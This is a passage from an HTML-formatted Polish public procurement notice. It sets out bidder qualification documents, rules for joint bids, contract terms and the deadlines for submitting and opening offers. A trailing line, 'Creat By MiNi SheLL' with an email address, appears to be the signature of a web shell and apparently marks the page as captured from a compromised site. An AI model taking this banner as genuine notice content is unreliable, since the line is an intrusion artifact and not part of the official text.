ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat<br/>wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane,<br/>oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających<br/>się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów - oświadczenie wykonawcy;<br/>w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne<br/>dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3<br/>miesięcy liczonych od dnia w którym upływa termin składania ofert – zgodnie<br/>z załącznikiem Nr 5 do niniejszej SWZ;<br/>W wykazie usług należy wskazać tylko te usługi, które potwierdzają spełnianie warunku udziału w<br/>postępowaniu, o którym mowa w rozdziale VI pkt 6.1.4 SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>składa wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia ( w formie<br/>elektronicznej, w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym)<br/>zgodnie z załącznikiem nr 8 do SWZ lub inny podmiotowy środek dowodowy potwierdzający, że<br/>wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>Dla swej skuteczności zobowiązanie musi zostać złożone przez osobę/osoby uprawnione do<br/>reprezentowania podmiotu trzeciego w powyższym zakresie. Zobowiązanie złożone przez osobę<br/>nieuprawnioną nie dowodzi udostępnienia zasobu przez podmiot trzeci.<br/>2. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, przedstawia, wraz z oświadczeniami, o którym mowa w pkt 8.1 SWZ<br/>także oświadczenia podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w<br/>zakresie, w jakim wykonawca powołuje się na jego zasoby – zgodnie z załącznikiem Nr 2 i 3 do<br/>SWZ.<br/>3. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach<br/>określonych w art. 118 ustawy, przedstawia na wezwanie zamawiającego dokumenty<br/>wymienione w pkt. 8.3.2 SWZ dotyczące tych podmiotów, potwierdzające, że nie zachodzą<br/>wobec tych podmiotów podstawy wykluczenia z postępowania.<br/>4. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:a)<br/>oświadczenia o których mowa w pkt. 8.1 SWZ składa z ofertą każdy z Wykonawców wspólnie<br/>ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu.b) w przypadku, o którym mowa w<br/>rozdziale 6.3 SWZ wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do<br/>oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>Oświadczenie należy złożyć wg wymogów załącznika Nr 4 do SWZ. Oświadczenie to jest<br/>podmiotowym środkiem dowodowym. c) zobowiązani są oni na wezwanie Zamawiającego,<br/>złożyć podmiotowe środki dowodowe, o których mowa w pkt. 8.3 SWZ, przy czym podmiotowe<br/>środki dowodowe, o których mowa: w pkt. 8.3.1 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku - w pkt. 8.3.2 SWZ składa<br/>każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Jeżeli została<br/>wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający<br/>może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy<br/>regulującej współpracę tych wykonawców.<br/>5. Potwierdzenie umocowania do działania w imieniu wykonawcy lub podmiotu<br/>udostępniającego zasoby: a) zamawiający w celu potwierdzenia, że osoba działająca w imieniu<br/>wykonawcy lub podmiotu udostępniającego zasoby jest umocowana do jego reprezentowania,<br/>żąda złożenia wraz z ofertą odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej<br/>Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru;b) wykonawca<br/>lub podmiot udostępniający zasoby nie jest zobowiązany do złożenia dokumentów, o których<br/>mowa w lit a), jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych<br/>baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów. c) jeżeli<br/>w imieniu wykonawcy lub podmiotu udostępniającego zasoby działa osoba, której umocowanie<br/>do jego reprezentowania nie wynika z dokumentów, o których mowa w lit a), zamawiający żąda<br/>od wykonawcy lub podmiotu udostępniającego zasoby złożenia wraz z ofertą pełnomocnictwa<br/>lub innego dokumentu potwierdzającego umocowanie do reprezentowania wykonawcy lub<br/>podmiotu udostępniającego zasoby.<br/>Ciąg dalszy w sekcji IX - Pozostałe informacje. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku,<br/>wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>2.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) oświadczenia o których mowa w pkt. 8.1 SWZ składa z ofertą każdy z Wykonawców wspólnie<br/>ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu.<br/>b) w przypadku, o którym mowa w rozdziale 6.3 SWZ wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi<br/>wykonają poszczególni wykonawcy. Oświadczenie należy złożyć wg wymogów załącznika Nr 4<br/>do SWZ. Oświadczenie to jest podmiotowym środkiem dowodowym.<br/>c) zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o<br/>których mowa w pkt. 8.3 SWZ, przy czym podmiotowe środki dowodowe, o których mowa:<br/>- w pkt. 8.3.1 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/- ą spełnienie warunku;<br/>- w pkt. 8.3.2 SWZ składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3. Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwości wprowadzenia zmian do zawartej umowy, na podstawie art.<br/>454-455 oraz postanowień Projektu Umowy.<br/>Zmiany umowy nie mogą wykraczać poza zakres świadczenia określonego w Projekcie umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-26 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. W formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym prowadzona będzie korespondencja związana z postępowaniem.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-26 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-24</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Ciąg dalszy treści: Sekcja IV Przedmiot Zamówienia - Sposób oceny ofert: Wyliczenia punktów<br/>zostaną dokonane z dokładnością do drugiego miejsca po przecinku, zgodnie z matematycznymi<br/>zasadami zaokrąglania.<br/><br/>Ciąg dalszy treści: Sekcja V Kwalifikacja Wykonawców - Wykaz innych wymaganych<br/>oświadczeń lub dokumentów:<br/>6.Pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (jeżeli dotyczy). 7.<br/>Formularz ofertowy – do wykorzystania wzór (druk), stanowiący Załącznik nr 9 do SWZ (przy<br/>czym Wykonawca może sporządzić ofertę wg innego wzorca, powinna ona wówczas obejmować dane wymagane dla oferty w SWZ i załącznikach).

Creat By MiNi SheLL
Email: jattceo@gmail.com